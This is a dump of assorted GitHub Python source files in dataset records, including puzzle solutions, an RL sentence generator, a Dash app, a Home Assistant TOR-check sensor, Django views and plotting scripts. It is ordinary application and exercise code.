explanation of the error.\n\n \"\"\"\n def __init__(self, message):\n self.message = message\n\n\ndef meetup(year, month, week, day_of_week):\n \"\"\"\n Description: Function for returning the first, second,, third, forth, last & teenth day\n of the month. \n \"\"\"\n \n descriptor_map = {\n \"first\": 0,\n \"second\": 1,\n \"third\": 2,\n \"fourth\": 3,\n \"fifth\": 4,\n \"last\": -1,\n \"teenth\": None\n }\n\n _days = {\n \"Monday\": 0,\n \"Tuesday\": 1,\n \"Wednesday\": 2,\n \"Thursday\": 3,\n \"Friday\": 4,\n \"Saturday\": 5,\n \"Sunday\": 6\n }\n\n if week not in list(descriptor_map.keys()):\n raise MeetupDayException(\"That day does not exist.\")\n\n cal = Calendar()\n\n w = [d for d in cal.monthdays2calendar(year, month)]\n print(w)\n list_of_days = [day for _week in w for day in _week if day[0]>0 and day[1] == _days[day_of_week]]\n print(list_of_days)\n\n if week == \"teenth\":\n for i in list_of_days:\n if i[0]>12 and i[0] <= 19:\n #print(i[1])\n return date(year, month, i[0])\n else:\n try:\n val = list_of_days[descriptor_map[week]]\n except Exception as e:\n raise MeetupDayException(\"That day does not exist.\")\n \n return date(year, month, val[0])","repo_name":"TheLinuxEnthusiast/exercism-df","sub_path":"python/meetup/meetup.py","file_name":"meetup.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70738565352","text":"class Solution(object):\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n\n for x in range(0, 9): #rows\n num_set1 = set()\n num_set2 = set()\n count_nums1 = 0\n count_nums2 = 0\n for y in range(0,9): \n \n if self.isConvertibleToInt(board[x][y]):\n count_nums1 +=1\n num_set1.add(board[x][y])\n if len(num_set1) != count_nums1:\n return False\n\n if self.isConvertibleToInt(board[y][x]): \n count_nums2 +=1\n num_set2.add(board[y][x])\n if len(num_set2) != count_nums2:\n return False\n\n for i in range(0, 9, 3): \n for j in range(0, 9, 3): \n num_set = set()\n count_nums = 0\n for x in range(i, i + 3): \n for y in range(j, j + 3): \n if self.isConvertibleToInt(board[x][y]):\n count_nums += 1\n num_set.add(board[x][y])\n if len(num_set) != count_nums:\n return False\n return True\n\n def isConvertibleToInt(self, s):\n try:\n int(s) \n return True \n except ValueError:\n return False \n","repo_name":"AbduAwad/LeetCodeProblemSolutions","sub_path":"0036-valid-sudoku/0036-valid-sudoku.py","file_name":"0036-valid-sudoku.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23253986760","text":"import numpy as np\nfrom collections import deque\nimport json\nimport itertools\nimport random\n\n\ndef getReachablePoints(pos,size) :\n\tx,y = size\n\tif pos[0] == 0 :\n\t\tif pos[1] == 0 :\n\t\t\treturn [1,1*x+0]\n\t\telif pos[1] == y-1 :\n\t\t\treturn [pos[1]-1,1*x+pos[1]]\n\t\telse :\n\t\t\treturn [pos[1]-1,pos[1]+1,1*x+pos[1]]\n\telif pos[1] == y-1 :\n\t\tif pos[0] == x-1 :\n\t\t\treturn [pos[0]*x+y-2,(pos[0]-1)*x+y-1]\n\t\telse :\n\t\t\treturn [pos[0]*x+y-2,(pos[0]-1)*x+y-1,(pos[0]+1)*x+y-1]\n\telif pos[0] == x-1 :\n\t\tif pos[1] == 0 :\n\t\t\treturn [(pos[0]-1)*x+pos[1],pos[0]*x+(pos[1]+1)]\n\t\telse :\n\t\t\treturn [(pos[0]-1)*x+pos[1],pos[0]*x+(pos[1]+1),pos[0]*x+(pos[1]-1)]\n\telif pos[1] == 0 :\n\t\treturn [pos[0]*x+1,(pos[0]-1)*x,(pos[0]+1)*x]\n\telse :\n\t\treturn [(pos[0]-1)*x+pos[1],(pos[0]+1)*x+pos[1],pos[0]*x+pos[1]-1,pos[0]*x+pos[1]+1]\n\ndef addNodes(pos,size,flags,q,game_map) :\n\tnodes = getReachablePoints(pos,size)\n\tfor node in nodes :\n\t\tif flags[node] == 0 and game_map[node/size[0],node%size[0]] == 0:\n\t\t\tflags[node] = 1\n\t\t\tq.append(node)\n\t\tif game_map[node/size[0],node%size[0]] == 2 :\n\t\t\tflags[node] = 1 \t\n\treturn q,flags\n\ndef convertOneHot(idx,l) :\n\tarr = np.zeros([l])\n\tarr[idx] = 1\n\treturn arr\n\ndef checkVocab(s, vocabulary):\n\tfl = 0\n\tfor i in s.split(\" \"):\n\t\tif i not in vocabulary:\n\t\t\tfl = 1\n\treturn fl\n\n# Case 4: Go to \n\ndef genObjectSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, active_rewards):\n\tids1 = []\n\tfor item in reward_dict :\n\t\tids1.append(item[0])\n\n\tids1 = np.array(ids1)\t\n\n\tfor item in data[\"objects\"]:\n\t\t\n\t\tide = item[\"id\"]\n\t\tif not ide in active_rewards:\n\t\t\tcontinue\n\n\t\treq_ind = np.where(ids1 == ide)\t\n\t\treq_ind = req_ind[0][0]\n\n\t\tloc = reward_dict[req_ind][1]\n\t\tsz = data[\"environment\"][\"Sizes\"][item[\"size\"]]\n\n\t\tif reachable[loc] == 1.0:\n\t\t\ts = \"Go to \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\n\n\treturn possible_sentences, pos_size\n\n#Case 7: Go to of \ndef genLocSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, ids, active_rewards):\n\tids1 = []\n\tfor item in reward_dict :\n\t\tids1.append(item[0])\n\tids1 = np.array(ids1)\t\n\n\trows, cols = reachable.shape\n\tfor item in data[\"objects\"]:\n\t\t\n\t\tif item[\"size\"] != \"small\":\n\t\t\tcontinue\n\t\t\n\t\tide = item[\"id\"]\n\n\t\tif not ide in active_rewards:\n\t\t\tcontinue\n\n\t\treq_ind = np.where(ids1 == ide)\n\t\treq_ind = req_ind[0][0]\n\n\t\trx, ry = reward_dict[req_ind][1]\n\t\t\n\t\tsize = data[\"environment\"][\"Sizes\"][item[\"size\"]]\n\t\t\n\t\tflagn = 0\n\t\tflags = 0\n\t\tflage = 0\n\t\tflagw = 0\n\t\tpos_n = []\n\t\tpos_s = []\n\t\tpos_e = []\n\t\tpos_w = []\t\t\n\n\t\tfor s in range(size):\n\t\t\tif ry+s <= cols-1 and rx-1 >= 0:\n\t\t\t\tif reachable[rx-1][ry+s] == 1.0 and ids[rx-1][ry+s] == 0.0:\n\t\t\t\t\tpos_n.append(((rx-1, ry+s), 1))\n\t\t\t\t\tflagn = 1\n\n\t\t\tif ry+s <= cols-1 and rx+size <= rows-1:\n\t\t\t\tif reachable[rx+size][ry+s] == 1.0 and ids[rx+size][ry+s] == 0.0:\n\t\t\t\t\tpos_s.append(((rx+size, ry+s), 1))\n\t\t\t\t\tflags = 1\n\n\t\t\tif ry-1 >= 0 and rx+s <= rows-1:\n\t\t\t\tif reachable[rx+s][ry-1] == 1.0 and ids[rx+s][ry-1] == 0.0: \n\t\t\t\t\tpos_w.append(((rx+s, ry-1), 1))\n\t\t\t\t\tflagw = 1\n\n\t\t\tif ry+size <= cols-1 and rx+s <= rows-1:\n\t\t\t\tif reachable[rx+s][ry+size] == 1.0 and ids[rx+s][ry+size] == 0.0:\n\t\t\t\t\tpos_e.append(((rx+s, ry+size), 1))\n\t\t\t\t\tflage = 1\n\n\t\tif flagn == 1:\n\t\t\ts = \"Go to north of \" + item[\"size\"]+ \" \" + item[\"color\"] + \" \" +item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tfor ele in pos_n:\n\t\t\t\t\t\tpos_size[ind].append(ele)\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append(pos_n)\n\n\t\tif flags == 1:\n\t\t\ts = \"Go to south of \" + item[\"size\"]+ \" \" +item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tfor ele in pos_s:\n\t\t\t\t\t\tpos_size[ind].append(ele)\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append(pos_s)\n\n\t\tif flagw == 1:\n\t\t\ts = \"Go to west of \" + item[\"size\"]+ \" \" +item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tfor ele in pos_w:\n\t\t\t\t\t\tpos_size[ind].append(ele)\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append(pos_w)\n\n\t\tif flage == 1:\n\t\t\ts = \"Go to east of \" + item[\"size\"]+ \" \" +item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tfor ele in pos_e:\n\t\t\t\t\t\tpos_size[ind].append(ele)\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append(pos_e)\n\t\n\treturn possible_sentences, pos_size\n\n# Case 8: Go to top/bottom right/left corners\ndef genCornerSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, ids):\n\trows, cols = reachable.shape\n\tif reachable[0][0] == 1.0 and ids[0][0] == 0.0:\n\t\ts = \"Go to top left corner\"\n\t\tfl = checkVocab(s, vocabulary)\n\t\tif fl == 0:\n\t\t\tpossible_sentences.append(s)\n\t\t\tpos_size.append([((0,0), 1)])\n\n\tif reachable[0][cols-1] == 1.0 and ids[0][cols-1] == 0.0:\n\t\ts = \"Go to top right corner\"\n\t\tfl = checkVocab(s, vocabulary)\n\t\tif fl == 0:\n\t\t\tpossible_sentences.append(s)\n\t\t\tpos_size.append([((0,cols-1), 1)])\n\n\tif reachable[rows-1][0] == 1.0 and ids[rows-1][0] == 0.0:\n\t\ts = \"Go to bottom left corner\"\n\t\tfl = checkVocab(s, vocabulary)\n\t\tif fl == 0:\n\t\t\tpossible_sentences.append(s)\n\t\t\tpos_size.append([((rows-1,0), 1)])\n\n\tif reachable[rows-1][cols-1] == 1.0 and ids[rows-1][cols-1] == 0.0:\n\t\ts = \"Go to bottom right corner\"\n\t\tfl = checkVocab(s, vocabulary)\n\t\tif fl == 0:\n\t\t\tpossible_sentences.append(s)\n\t\t\tpos_size.append([((rows-1,cols-1), 1)])\n\n\n\treturn possible_sentences, pos_size\n\n# Case 9: Go to \n# Case 10: Go to \ndef genAttrSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, active_rewards):\n\t\n\tobj_name = []\n\tobj_attr = []\n\tobj_locsz = []\n\n\tids1 = []\n\treachable_objs = []\n\treachable_objs_attr = []\n\n\tfor item in reward_dict :\n\t\tids1.append(item[0])\n\tids1 = np.array(ids1)\t\n\n\tfor item in data[\"objects\"]:\n\t\t\n\t\tide = item[\"id\"]\n\t\tif not ide in active_rewards:\n\t\t\tcontinue\n\n\t\treq_ind = np.where(ids1 == ide)\t\n\t\treq_ind = req_ind[0][0]\n\t\t#print req_ind\n\t\tloc = reward_dict[req_ind][1]\n\t\tsz = data[\"environment\"][\"Sizes\"][item[\"size\"]]\n\t\t\n\t\tif reachable[loc] == 1.0:\n\t\t\tname = item[\"size\"] + \" \" + item[\"color\"] +\" \"+item[\"type\"]\n\t\t\tif not name in reachable_objs :\n\t\t\t\treachable_objs.append(name)\n\t\t\t\treachable_objs_attr.append([(loc,sz)])\n\n\t\t\tname = item[\"color\"] +\" \"+item[\"type\"]\t\t\n\t\t\tif name in obj_name:\n\t\t\t\tind = obj_name.index(name)\n\t\t\t\tobj_attr[ind].append((item[\"size\"], item[\"color\"]))\n\t\t\t\tobj_locsz[ind].append((loc, sz))\n\t\t\telse:\n\t\t\t\tobj_name.append(name)\n\t\t\t\tobj_attr.append([(item[\"size\"], item[\"color\"])])\n\t\t\t\tobj_locsz.append([(loc, sz)])\n\n\t\t\ts = \"Go to \" + item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\n\t\t\tts = \"There is a \" + item[\"color\"] + \" \" + item[\"type\"] + \" Go to it\"\n\t\t\tfl = checkVocab(ts, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif ts in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(ts)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(ts)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\n\n\t\t\t\n\n\t\t\ts1 = \"Go to \" + item[\"size\"] + \" \" + item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s1, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s1 in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s1)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s1)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\t\t\t\n\t\t\tts1 = \"There is a \" + item[\"size\"] + \" \" + item[\"color\"] + \" \" + item[\"type\"] + \" Go to it\"\n\t\t\tfl = checkVocab(ts1, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif ts1 in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(ts1)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(ts1)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\n\t\t\t\n\t\t\n\tfor i in range(len(obj_name)):\n\t\tif len(obj_attr[i]) > 1:\n\t\t\t\n\t\t\ttsd2 = \"There are multiple \" + obj_name[i] + \" Go to larger one\"\n\t\t\ttsd3 = \"There are multiple \" + obj_name[i] + \" Go to smaller one\"\t\t\t\n\t\t\treq_small = req_large = prev_large = 1\n\t\t\tprev_small = 3\n\t\t\t\n\t\t\tfor j in range(len(obj_locsz[i])):\n\t\t\t\tif obj_locsz[i][j][1] < prev_small:\n\t\t\t\t\tprev_small = obj_locsz[i][j][1]\n\t\t\t\t\treq_small = obj_locsz[i][j]\n\t\t\t\tif obj_locsz[i][j][1] > prev_large:\n\t\t\t\t\tprev_large = obj_locsz[i][j][1]\n\t\t\t\t\treq_large = obj_locsz[i][j]\n\t\t\t\n\t\t\tfl2 = checkVocab(tsd2, vocabulary)\n\t\t\tif fl2 == 0:\n\t\t\t\tif req_large != 1 and req_small != 1:\n\t\t\t\t\tpossible_sentences.append(tsd2)\n\t\t\t\t\tpos_size.append([req_large])\n\t\t\tfl3 = checkVocab(tsd3, vocabulary)\n\t\t\tif fl3 == 0:\n\t\t\t\tif req_small != 1 and req_large != 1:\n\t\t\t\t\tpossible_sentences.append(tsd3)\n\t\t\t\t\tpos_size.append([req_small])\n\t\n\t\t\t\t\t\t\t\n\treturn possible_sentences, pos_size\n\ndef isDistanceinSentence(sentence) :\n\tif 'north' in sentence :\n\t\treturn True\n\tif 'south' in sentence :\n\t\treturn True\n\tif 'east' in sentence :\n\t\treturn True\n\tif 'west' in sentence :\n\t\treturn True\n\treturn False\n\ndef genPossibleSentences(reachable, reward_dict, data, vocabulary,ids, active_rewards):\n\t\n\t\n\tmax_sentence_length = 9\n\n\tpossible_sentences = []\n\tpos_size = []\n\t\n\tobj_name = []\n\tobj_attr = []\n\tobj_locsz = [] \n\n\t\t\n\tpossible_sentences, pos_size = genObjectSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, active_rewards)\t\n\t\t\t\n\tpossible_sentences, pos_size = genLocSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, ids, active_rewards)\n\n\tpossible_sentences, pos_size = genCornerSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, ids)\n\t\n\tpossible_sentences, pos_size = genAttrSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, active_rewards)\n\n\t\n\t#for s in possible_sentences:\n\t#\tprint(s)\n\n\t\n\tif len(possible_sentences) == 0 :\n\t\treturn []\n\tindex_value = random.sample(list(enumerate(possible_sentences)), 1)\n\ts = index_value[0][1]\n\tdistanceInSentence = isDistanceinSentence(s)\n\ts = s.split(\" \")\n\trem = max_sentence_length - len(s)\n\tchar_to_int = dict((c, i) for i, c in enumerate(vocabulary))\n\tint_to_char = dict((i, c) for i, c in enumerate(vocabulary))\n\tinteger_encoded = [char_to_int[char] for char in s]\n\tonehot_encoded = list()\n\n\tfor value in integer_encoded:\n\t\tletter = [0 for _ in range(len(vocabulary))]\n\t\tletter[value] = 1\n\t\tonehot_encoded.append(letter)\n\n\tpad = [0]*len(vocabulary)\n\tfor r in range(rem):\n\t\tonehot_encoded.append(pad)\n\n\t\n\treturn [index_value[0][1], onehot_encoded, pos_size[index_value[0][0]], distanceInSentence]\n\n\n\ndef bfs(game_map,start_pos,reward_dict, data, vocabulary,ids, active_rewards) :\n\tx,y = game_map.shape\n\tflags = np.zeros([x*y])\n\tflags[start_pos[0]*x+start_pos[1]] = 1\n\tq = deque([])\n\tq.append(start_pos[0]*x+start_pos[1])\n\twhile q :\n\t\tpos = q.popleft()\n\t\tq,flags = addNodes((pos/x,pos%x),(x,y),flags,q,game_map)\n\n\t\n\treachable = np.zeros([x,y])\n\tfor i in range(x) :\n\t\tfor j in range(y) :\n\t\t\treachable[i,j] = flags[i*x+j]\t\t\t\n\tarr = genPossibleSentences(reachable, reward_dict, data, vocabulary,ids, active_rewards)\n\t\n\treturn arr\n\t\n\n# if __name__ == '__main__' :\n# \ta = np.zeros([3,3])\n# \tstart_pos = (1,1)\n# \ta[1,0] = 1\t\n# \ta[2,1] = 1\n# \treachable, reward_dict = bfs(a,start_pos,[[0,(2,2)],[1,(0,2)],[2,(2,0)]])\n# \tprint('reachable is ', reachable)\n# \tprint('reward dict is ', reward_dict)\n\n","repo_name":"rl-lang-grounding/rl-lang-ground","sub_path":"generateSentence.py","file_name":"generateSentence.py","file_ext":"py","file_size_in_byte":11814,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"16223822215","text":"def fibo(n):\n if n > 2:\n fn = fibo(n-1) + fibo(n-2)\n else:\n return 1\n return fn\n\nn = int(input(\"Digite quantos números da sequência você quer: \"))\nfn = 0\nprint(fibo(n))","repo_name":"GabGomes16/Algoritmos-e-Logica-de-Programacao-II","sub_path":"trimestre-1/numeros-de-Fibonacci.py","file_name":"numeros-de-Fibonacci.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36758136457","text":"### Import packeges ###\r\nfrom dash import Dash, html, dcc, dash_table, callback, Output, Input, State, dash_table, exceptions\r\nimport pandas as pd \r\nimport numpy as np\r\n# import ipywidgets as widgets\r\n# from IPython.display import display\r\nimport plotly.express as px\r\nimport plotly.graph_objs as go\r\nfrom plotly.subplots import make_subplots\r\nfrom datetime import datetime, timedelta, date\r\nfrom dateutil.relativedelta import relativedelta\r\nimport os\r\n\r\n\r\n\r\n### Dash creation ###\r\napp = Dash(__name__, suppress_callback_exceptions=True)\r\nserver = app.server\r\n\r\n\r\n### First page layout ###\r\nhomepage_layout = html.Div(\r\n className='total',\r\n children=[\r\n html.H1('Enzo vacilão'),\r\n dcc.Graph(id='graph')\r\n ]\r\n)\r\n\r\n@app.callback(\r\n Output('graph', 'figure'),\r\n [Input('graph', 'id')]\r\n)\r\ndef update_graph(graph_id):\r\n df = pd.DataFrame(dict(\r\n x = [1, 3, 2, 4],\r\n y = [1, 2, 3, 4]\r\n ))\r\n fig = px.line(df, x=\"x\", y=\"y\", title=\"Unsorted Input\") \r\n return fig\r\n\r\n\r\n### Def layout ###\r\napp.layout = homepage_layout\r\n\r\n\r\n\r\n# Execute o aplicativo Dash\r\nif __name__ == '__main__':\r\n app.run_server(debug=True) \r\n \r\n","repo_name":"rodrigocardosos/dash_deploy_test","sub_path":"dash_teste.py","file_name":"dash_teste.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30126089226","text":"\"\"\"Binary sensor platform for TOR Check custom component.\"\"\"\nfrom __future__ import annotations\n\nfrom collections.abc import Mapping\nfrom typing import Any\n\nfrom homeassistant.components.binary_sensor import (\n BinarySensorDeviceClass,\n BinarySensorEntity,\n BinarySensorEntityDescription,\n)\n\nfrom .const import ATTR_REAL_IP, ATTR_TOR_IP, DOMAIN\nfrom .coordinator import (\n KEY_MY_IP,\n KEY_MY_TOR_IP,\n KEY_TOR_CONNECTED,\n TorCheckDataUpdateCoordinator,\n)\nfrom .entity import TorCheckEntity\n\nENTITY_DESCRIPTIONS = (\n BinarySensorEntityDescription(\n key=\"tor_check\",\n name=\"TOR\",\n device_class=BinarySensorDeviceClass.CONNECTIVITY,\n ),\n)\n\n\nasync def async_setup_entry(hass, entry, async_add_devices):\n \"\"\"Set up the binary_sensor platform.\"\"\"\n coordinator = hass.data[DOMAIN][entry.entry_id]\n async_add_devices(\n TorCheckBinarySensor(\n coordinator=coordinator,\n entity_description=entity_description,\n )\n for entity_description in ENTITY_DESCRIPTIONS\n )\n\n\nclass TorCheckBinarySensor(TorCheckEntity, BinarySensorEntity):\n \"\"\"TOR Check binary sensor class.\"\"\"\n\n def __init__(\n self,\n coordinator: TorCheckDataUpdateCoordinator,\n entity_description: BinarySensorEntityDescription,\n ) -> None:\n \"\"\"Initialize the binary_sensor class.\"\"\"\n super().__init__(coordinator)\n self.entity_description = entity_description\n\n @property\n def is_on(self) -> bool:\n \"\"\"Return true if the binary_sensor is on.\"\"\"\n return self.coordinator.data.get(KEY_TOR_CONNECTED)\n\n @property\n def extra_state_attributes(self) -> Mapping[str, Any] | None:\n \"\"\"Return entity specific state attributes.\"\"\"\n attrs = {\n ATTR_REAL_IP: self.coordinator.data.get(KEY_MY_IP),\n ATTR_TOR_IP: self.coordinator.data.get(KEY_MY_TOR_IP),\n }\n attrs.update(super().extra_state_attributes or {})\n return attrs\n","repo_name":"Limych/ha-tor_check","sub_path":"custom_components/tor_check/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34992541419","text":"from django.shortcuts import render\nfrom .models import Fund, Company, PriceData\n\n\n# Create your views here.\n\n\ndef get_funds(request):\n fund_list = Fund.objects.order_by(\"-market_cap\")\n monthly_winners = Fund.objects.order_by(\"-one_month\")\n annual_winners = Fund.objects.order_by(\"-one_year\")\n company_list = Company.objects.order_by(\"id\")\n price_list = PriceData.objects.order_by(\"-date\")\n context = {\n \"fund_list\": fund_list,\n \"company_list\": company_list,\n \"price_list\": price_list,\n \"monthly_winners\": monthly_winners,\n \"annual_winners\": annual_winners,\n }\n\n return render(request, \"dashboard.html\", context)\n\n\ndef get_single_fund(request, fund):\n fund = fund.replace(\"-\", \" \")\n fund_object = Fund.objects.get(name=fund)\n price_data = PriceData.objects.filter(fund_link=fund_object.id)\n chart_data = []\n\n for price in price_data:\n col = []\n col.append(price.date.strftime(\"%Y-%m\"))\n col.append(price.price)\n chart_data.append(col)\n\n # calculate_returns(fund_list, price_list)\n context = {\n \"fund\": fund_object,\n \"price_data\": price_data,\n \"chart_data\": chart_data,\n }\n return render(request, \"single-fund.html\", context)\n\n\ndef search_funds(request):\n if request.method == \"POST\":\n searched = request.POST[\"searched\"]\n funds = Fund.objects.filter(name__contains=searched)\n\n return render(request, \"search.html\", {\"searched\": searched, \"funds\": funds})\n else:\n return render(request, \"search.html\")\n","repo_name":"NicFindlay/FundList","sub_path":"funds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28991756666","text":"import zillow\nfrom address_handling import Address\nfrom helper import dec\n\n\ndef zillow_api(address):\n home_address = Address(address)\n if home_address.is_zip_good():\n zip_code = home_address.zip_code\n else:\n zip_code = '98058'\n address = '1309 Harrington Ave SE, Renton'\n key = dec('M1-OLo18g1trev4fo_pu1if', 15)\n api = zillow.ValuationApi()\n data = api.GetDeepSearchResults(key, address, zip_code)\n if not isinstance(data, str):\n full_data = api.GetDeepComps(key, data.zpid)\n if not isinstance(full_data, str):\n full_data['principal'].extended_data = data.extended_data\n else:\n full_data = {\n 'principal': data,\n 'comps': [data]\n }\n return full_data\n else:\n return \"Wrong address\"\n","repo_name":"huiyuandiknow/Home_Data_App","sub_path":"zillow_api_handler.py","file_name":"zillow_api_handler.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16173258464","text":"from grammars.grammars import lang_dict\nfrom treemanager import TreeManager\n\njava = lang_dict[\"Java\"]\n\nclass Test_Java:\n def setup_class(cls):\n parser, lexer = java.load()\n cls.lexer = lexer\n cls.parser = parser\n cls.parser.init_ast()\n cls.ast = cls.parser.previous_version\n cls.treemanager = TreeManager()\n cls.treemanager.add_parser(cls.parser, cls.lexer, java.name)\n\n def reset(self):\n self.parser.reset()\n self.treemanager = TreeManager()\n self.treemanager.add_parser(self.parser, self.lexer, java.name)\n\n def test_floats_ints(self):\n self.reset()\n program = \"\"\"class C {\n float a = 1F;\n int b = 0_123;\n int c = 0b110;\n long d = 0b110L;\n float f = 0.e1F;\n float g = 0F;\n float h = 0e1F;\n int i = 0e1;\n public main(){\n r.d();\n }\n}\"\"\"\n self.treemanager.import_file(program)\n assert self.parser.last_status == True\n","repo_name":"softdevteam/eco","sub_path":"lib/eco/test/test_grammars.py","file_name":"test_grammars.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"73120461673","text":"\n#%%\nimport pandas\n\ndf = pandas.read_csv('./data/browser-ww-monthly-200901-201909.csv')\n# from https://gs.statcounter.com/browser-market-share#monthly-200901-201909\ndf.head()\n\n#%%\ndf.tail()\n\n#%%\ndf.index=df['Date']\n\n#%%\ndf['Edge']\n\n# df = df.drop(columns=['Date'])\n\n#%%\nimport matplotlib.pyplot as pyplot\npyplot.rcParams['figure.facecolor'] = '#002B3600'\npyplot.rcParams['axes.facecolor'] = '#00000000'\nCOLOR = 'black'\npyplot.rcParams['text.color'] = COLOR\npyplot.rcParams['axes.labelcolor'] = COLOR\npyplot.rcParams['xtick.color'] = COLOR\npyplot.rcParams['ytick.color'] = COLOR\npyplot.rcParams['lines.color'] = COLOR\npyplot.rcParams['grid.color'] = COLOR\npyplot.rcParams['lines.color'] = COLOR\npyplot.rcParams['legend.facecolor'] = '#ffffff19'\n# pyplot.rcParams['figure.edgecolor'] = COLOR\npyplot.rcParams['axes.edgecolor'] = COLOR\n\nd = {'Chrome': 'b',\n\t'Firefox': 'r',\n\t'IE': 'black',\n\t'Safari': 'g',\n\t'Edge': 'magenta'}\nfor browser in d:\n\tpyplot.plot(df.index, df[browser], d[browser], label=browser)\n# pyplot.plot(ie_points, color='turquoise', label='Internet Explorer')\n# pyplot.plot(firefox_points, color='r', label='Firefox')\n# pyplot.plot(chrome_points, color='b', label='Chrome')\n# pyplot.plot(safari_points, color='g', label='Safari')\n# pyplot.plot(edge_points, color='magenta', label='Edge')\npyplot.legend()\npyplot.title('Browser share')\npyplot.xlabel('Year')\npyplot.ylabel('Share (%)')\npyplot.ylim(0,100)\nax = pyplot.gcf().axes[0]\nax.set_xticks(ax.get_xticks()[::12])\npyplot.grid()\nfigure = pyplot.gcf()\nfigure.set_size_inches((12,10))\npyplot.show()\n\n\n#%%\n","repo_name":"Lrizika/DS-Unit-1-Project-1","sub_path":"e2.py","file_name":"e2.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22360395478","text":"# coding: utf-8\n\n\"\"\"\n Veracode Web Application Scanning Configuration Service API\n\n Web Application Scanning Configuration API Documentation # noqa: E501\n\n OpenAPI spec version: 1.0\n Contact: veracode@veracode.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass AnalysisRequest(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute 